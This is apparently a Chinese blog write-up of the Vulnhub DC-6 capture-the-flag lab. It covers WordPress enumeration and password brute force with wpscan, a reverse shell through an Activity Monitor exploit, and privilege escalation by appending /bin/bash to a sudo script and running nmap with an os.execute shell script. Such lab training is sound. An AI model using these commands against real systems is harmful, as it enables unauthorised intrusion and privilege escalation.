Vulnhub靶场实战———DC6

最新推荐文章于 2024-07-06 11:48:34 发布
最新推荐文章于 2024-07-06 11:48:34 发布
阅读量172 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67309561/article/details/130542817
版权

环境下载

DC and Five86 Series Challenges - DC-6

 环境配置

信息探测 

发现80端口开放,那我们就访问网页

获取FLAG 

在这里我们发现这个网页打不开了,跟DC2一样被重定向了,那我们修改一下hosts文件

添加一条IP

访问成功,但是我们并没有找到什么有价值的东西

此时我们在网页最下方发现这个网页框架是WordPress

先不着急,我们先挖掘一下他的子域名

dirb http://wordy/

我们发现了一个登录页面,打开看看

 

果然是存在的, 那步骤就和DC2很像了,找到用户名,爆破密码,登录账户

既然如此,那我们先用wpscan找到用户名

wpscan --url wordy -e u

果然存在5个用户名

那接下来就是爆破密码,但是我们在下载DC6时在官网上注意到作者给的提示

他给了一下密码字典的提示,这给我们省了不少力气

cd /usr/share/wordlists
cp rockyou.txt.gz rockyou.txt.gz.bak
gunzip rockyou.txt.gz rockyou.txt

 密码字典完成,我们再将刚才获取到的五个用户名保存在一个文件下

这时我们使用wpscan爆破密码,找到用户的登录密码 

wpscan --url wordy -U user.txt -P passwd.txt
Username: mark, Password: helpdesk01

 找到了

那我们去登录一下

 成功进入,但是我们在这个网页上看了许久还是没发现什么有价值的信息,但是旁边的Activity monitor引起了我的注意

我们去kali上搜索一下

searchsploit activity monitor

 果然是有漏洞的,我们使用45274.html的试一试

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html
cp 45274.html 45274.html.bak 
vim 45274.html

 我们修改一下html中的文件

再打开临时HTTP服务 ,打开监听,并访问45274.html页面

python -m http.server 80

 反弹shell成功

我们进入到mark用户的家目录下,stuff文件下有一个things-to-do.txt文件,查看文件内容发现是graham用户及登录密码

cd /home/mark/stuff
cat things-to-do.txt

那我们ssh登录一下

ssh graham@192.168.100.15

 登录成功

我们查看一下当前用户可以执行的操作,发现可以运行jens用户下面的backups.sh

sudo -l

那我们去查看一下这个文件,发现是对web的文件进行打包备份

cat backups.sh

那我们去执行执行一下这个文件

echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh

脚本执行成功后,我们切换到jens用户,再次查看一下jens可以执行的操作 

sudo -l

我们发现了一个nmap提权提示操作,那我们去百度一下他的操作方法

我们百度到他是可以写入一条命令到getShell,并通过nmap运行getShell成功进入root用户,在/root目录下找到theflag.txt文件 

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell
cd /root
cat theflag.txt

成功提权并获取到flag !

Digh
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 904
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战
DC-6靶场
m0_71518346的博客
12-18 252
5.wpscan爆破:wpscan --url http://wordy/ -U dc6.txt -P dc6passwd.txt。1,扫描:nmap 192.168.0.0/24,或者sudo arp-scan -l 找到dc6的地址。5.使用jens的身份执行该脚本:sudo -u jens /home/jens/backups.sh。,找到mark用户的家目录下的stuff文件夹,查看里面的things-to-do.txt。1,nmap扫描得80,22端口开放,访问网站。
DC6靶场通关详细记录】
博客
12-19 1054
主机靶场DC6通关详细记录
wpscan渗透wordpress靶机——dc6
网络设备配置-华为
09-22 1136
wordpress: wpscan: 实验环境:kali linux和靶机环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip 下载后,直接在vm打开即可。 注意要使kali和靶机同处一个网段之中,我这里都在VM中搭建NAT模式。 信息收集 靶机打后是这样的: 这个时候出于需求目的,我们需要探测目标主机的ip、操作系统和版本以及其他服务的版本号。kali中集成了很多信息收集的工具,我这里仅用最常使用的 NMAP。 一、勘测目标主机ip地址和开放端口及服
DC6-靶机
Au
10-30 1658
下载地址 下面是作者的提示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
vulnhub靶场实战系列-DC-1实战流程图
05-17
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
Diablo II 的DC6图像文件格式
a_rice的专栏
03-02 3079
Diablo II 的DC6图像文件格式   经过n天的细心研究,并且参考了一些E文资料和源程序。终于……(^_^哈哈哈哈哈哈哈,我真是天才啊!接下来就是一阵鸡飞蛋打!惨!)。算了,还是开门见山吧!   简单的来说,DC6文件主要分为3部分:1.        文件头(24字节);2.        图像帧在DC6文件中的指针索引(大小还得由文件头的一些数据来确定);3.        图像帧数据
DC6靶机训练
E1even的博客
09-06 254
kali:192.168.78.131 DC-6:192.168.78.140 ifconfig nmap -sP 192.168.78.0/24 nmap -p 1-65535 -A -sV 192.168.78.140 访问80端口,查看框架 眼熟的WordPress,扫描域名,寻找我们需要的登录框 find / -name "dirseach*" 2> /dev/null (查询dirseach模块在哪里 python3 dirsearch.py -u url -e php 找到我们需
DC系列(6)DC-6靶机渗透
Nikris的博客
01-12 3605
DC6
DC6-靶机渗透
banacyo14206的博客
08-22 544
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 1899
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
vulnhubdc6
qq_54030686的博客
06-14 847
DC系列第六篇,整体而言难度较低,此篇之后,不再进行较为细致的篇幅 总体逻辑:话不多说,开始干 主机发现,端口扫描 目标IP为192.168.43.140 开放两个端口22 和80 端口,其中80端口对应的服务为wordy,修改hosts文件,路径为/etc/hosts,添加值 22端口尝试进行爆破,采用用户名top50,字典使用弱口令top100进行尝试 未发现相应结果 进行指纹识别 发现为wordpress框架,使用wordpress专用扫描器进行检测,使用-e参数爆破用户 存在5个用户复制变异成字典
【ARMv8/v9 GIC 系列 5.4 -- 中断分组与安全及优先级配置】
最新发布
CodingCos的博客
07-06 41
在这两种状态中,都可以执行用户级别和特权级别的代码,但是在非安全状态下执行的软件只能通过对安全监视器(Secure Monitor)的系统调用来访问安全状态。GIC(通用中断控制器)架构支持与这两种安全状态相关的中断的路由和处理。在多处理器系统中,系统内的一个或多个处理元素(PEs)可能支持仅在安全状态下可用的资源访问,或仅在非安全状态下可用的资源访问。这种灵活的配置允许系统根据需要调整中断处理的优先级分组,使得系统能够更有效地响应不同优先级的中断请求。标志指示GIC是否配置为支持ARMv8-A安全模型。
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1028
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 542
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
vulnhub靶场 breakout
08-29
- *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值